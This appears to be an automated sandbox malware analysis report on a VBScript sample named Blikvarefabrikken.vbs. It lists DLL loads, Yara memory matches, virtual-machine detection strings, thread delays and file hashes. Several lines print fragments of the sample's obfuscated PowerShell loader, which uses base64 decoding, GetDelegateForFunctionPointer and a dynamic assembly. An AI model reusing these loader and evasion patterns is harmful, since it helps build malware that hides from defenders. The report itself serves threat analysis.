Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior

Source: Yara match	File source: 00000007.00000002.2119893236.00000000092E7000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.2336376984.0000000004897000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Outrive)$globaL:HAiRpiecEs = [sysTEm.TEXT.ENCodiNG]::aScII.GETsTRinG($FRigGAs)$gloBAl:EMEndAtiOnErne=$HaIrpIeCEs.suBsTRiNg($gENKENDELSesGldES,$DIsCOmMODEs)<#gendanne touchback Svngng
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Gavekortets $Muliggoerbandonedly $Landskinkernes), (Fotodetektorens @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:skadeligste = [AppDomain]::CurrentDomai
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($nierne)), $Vilhelmines).DefineDynamicModule($Rugmel15, $false).DefineType($Skrigeungernes20, $undermanned, [System.MulticastDelegate])
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Outrive)$globaL:HAiRpiecEs = [sysTEm.TEXT.ENCodiNG]::aScII.GETsTRinG($FRigGAs)$gloBAl:EMEndAtiOnErne=$HaIrpIeCEs.suBsTRiNg($gENKENDELSesGldES,$DIsCOmMODEs)<#gendanne touchback Svngng

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00B5B2D9 push esp; retf	7_2_00B5B2E1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_00B59E20 push esp; ret	7_2_00B5A159
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_06EDEDDE push ds; ret	7_2_06EDEDDF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_06EDFA58 push A407E96Ah; retf	7_2_06EDFBCD
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_087208B0 push ds; iretd	7_2_087208B1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_0872122B pushad ; iretd	7_2_0872122C
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_087265A6 push es; ret	7_2_087265B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_08721E53 push 83F44D5Ch; retf	7_2_08721EBF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_08722E4D push edx; retf	7_2_08722E58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_0872060D push edx; ret	7_2_08720626
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 7_2_0872474B push ebp; ret	7_2_0872474D

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5867	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4018	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6447	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3185	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4928	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6272	Thread sleep time: -7378697629483816s >= -30000s	Jump to behavior
Source: C:\Windows\System32\svchost.exe TID: 6792	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $;r$Hyper-V Time Synchronization Service
Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $;r$Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: BStopped vmicshutdown Hyper-V Guest Shutdown Service
Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: BStopped vmicheartbeat Hyper-V Heartbeat Service
Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: BStopped vmicvmsession Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Remote Desktop Virtualizati...
Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: BStopped vmicrdv Hyper-V Remote Desktop Virtualizati...
Source: svchost.exe, 00000009.00000002.2339166678.0000019942859000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.2337521153.000001993D22B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: BStopped vmicguestinterface Hyper-V Guest Service Interface
Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: #Hyper-V Remote Desktop Virtualizati
Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Guest Shutdown Service
Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Guest Service Interface
Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $;r-Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF812AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Heartbeat Service
Source: powershell.exe, 00000004.00000002.1155363014.000001AFFE170000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Heartbeat Service
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF812AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Shutdown Service
Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: &Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Data Exchange Service
Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $;r!Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF812AF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Time Synchronization Service
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF812AF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: $Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicvss
Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: BStopped vmictimesync Hyper-V Time Synchronization Service
Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat
Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicshutdown
Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Stopped vmicvss
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF812AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Data Exchange Service
Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: BStopped vmicvss Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF812AF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: !Hyper-V PowerShell Direct Service
Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: BStopped vmickvpexchange Hyper-V Data Exchange Service
Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Volume Shadow Copy Requestor
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF812AF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V Guest Service Interface
Source: powershell.exe, 00000004.00000002.1117306076.000001AF80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1117306076.000001AF812AF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: -Hyper-V Remote Desktop Virtualization Service
Source: powershell.exe, 00000004.00000002.1117306076.000001AF81CAF000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: &Hyper-V Time Synchronization Service
Source: powershell.exe, 00000007.00000002.2081602385.00000000042F9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: vmicheartbeat

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

ID:	1658919
Product:	CloudBasic
Start time:	08:11:14
Start date:	08.04.2025
Sample:	Blikvarefabrikken.vbs
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	b7d8d9cb6cffa5ae6ecb12d0b1a85b27
SHA1:	cbdc3d17f572bec63e07a1a734ae80b4b3f09adb
SHA256:	327a98bd948262a10e37e7d0692c95e30ba41ace15fe01d8e614a9813ad9d5cf
Filetype:	Visual Basic Script (13500/0) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Network\Downloader\edb.log	data	C449154787A8AC604E5FDFD8ADDF47BA	A399744868C4C9905477D862AF102BD1121DBF60	30FDBF7D12AB6C46021A33A9BDFE492C87065C49BEB8EE0CB9761007F4BBBA13
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db	Extensible storage engine DataBase, version 0x620, checksum 0x08141935, page size 16384, DirtyShutdown, Windows version 10.0	2696E4EDE50564AD39932BD60A7E6675	5101E786EACD07C48D5EA252F6D1EF1D7A1C64B9	44F4EFD3D7453BC1809E9B6490D35BF3C31C39CE38AD208C49B4E21209F4E068
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm	data	02817B84F09B9B1CEB4A6F5920A99998	8BDDF07F2F855012E9E60F30B472A692126E8996	7DF686C4F5A9E45B99C16C62B89D0128661D1466538AE5A67233FE1221AE0188
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	106D01F562D751E62B702803895E93E0	CBF19C2392BDFA8C2209F8534616CCA08EE01A92	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	BC6DB77EB243BF62DC31267706650173	9E42FEFC2E92DE0DB2A2C9911C866320E41B30FF	5B000939E436B6D314E3262887D8DB6E489A0DDF1E10E5D3D80F55AA25C9FC27
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3bcuc2li.ysb.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fv1cylqm.nuw.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nwsl2t3s.5hg.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rt4on5nb.lj2.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\Motorgadens.Alb	ASCII text, with very long lines (65536), with no line terminators	3AC75E8B652807F6AFB45E2180BE437B	F303B3F845D15A3A59B2C7811A966DDA8ACDD9BC	29E815DC846277FE7158374D957E4F765E6041BF410CD4FE161472C0B38A57B0
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp	JSON data	DCA83F08D448911A14C22EBCACC5AD57	91270525521B7FE0D986DB19747F47D34B6318AD	2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9

Windows Analysis Report Blikvarefabrikken.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
Blikvarefabrikken.vbs

Malware Threat Intel
Provided by